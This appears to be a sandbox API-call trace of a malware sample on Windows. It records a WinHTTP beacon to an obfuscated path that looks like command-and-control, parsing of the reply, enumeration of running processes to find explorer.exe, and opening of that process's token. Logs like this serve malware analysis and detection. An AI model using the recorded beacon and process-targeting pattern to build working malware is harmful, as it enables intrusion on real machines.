	[0247.624] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/g2Ol4Mh1NdzJd0Mg0GaxJaq9Sl2Jas8/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0247.624] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0247.624] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0248.076] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0248.077] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0248.077] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0248.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15b8
	[0248.077] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27e15b8, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27e15b8*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0248.077] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0248.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e15b8, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0248.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e16f0
	[0248.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e15b8, cbMultiByte=3, lpWideCharStr=0x27e16f0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0248.077] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0248.077] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0248.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15e8
	[0248.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15d0
	[0248.077] lstrcpynW (in: lpString1=0x27e15d0, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0248.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14b0) returned 1
	[0248.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e16f0) returned 1
	[0248.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15e8) returned 1
	[0248.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15b8) returned 1
	[0248.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x644
	[0248.080] Process32FirstW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0248.081] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0248.081] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0248.082] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0248.082] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0248.083] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0248.083] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.084] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0248.084] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0248.085] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0248.085] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.086] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0248.086] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0248.087] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0248.087] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0248.088] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0248.088] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0248.089] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0248.089] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0248.090] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0248.090] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.091] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.091] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.092] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.092] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.094] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.094] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.095] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.095] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.096] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.096] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.098] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.098] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.099] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.099] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0248.100] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0248.100] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.101] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.101] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0248.102] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0248.102] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.103] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0248.103] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.104] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.104] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.105] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0248.105] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0248.106] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0248.106] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0248.107] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0248.107] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0248.108] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0248.108] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0248.109] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0248.109] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0248.110] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0248.110] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0248.111] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0248.111] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0248.112] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0248.112] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0248.112] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0248.113] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0248.114] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0248.114] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0248.114] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0248.114] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0248.115] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0248.115] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0248.116] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0248.116] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0248.117] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0248.117] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0248.118] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0248.118] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0248.154] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0248.154] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0248.156] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0248.156] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0248.157] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0248.157] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0248.158] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0248.158] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0248.160] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0248.160] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.161] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0248.161] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.162] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0248.162] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.164] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0248.164] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0248.165] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0248.165] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.167] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.167] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.168] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.168] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.169] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.169] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.170] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.170] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.171] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0248.171] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.172] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.172] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.173] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.173] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0248.174] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0248.174] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0248.175] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0248.175] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0248.176] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0248.176] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.177] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0248.178] Process32NextW (in: hSnapshot=0x644, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0248.178] CloseHandle (hObject=0x644) returned 1
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1450
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e18b8
	[0248.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807258
	[0248.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x644
	[0248.179] OpenProcessToken (in: ProcessHandle=0x644, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x650) returned 1
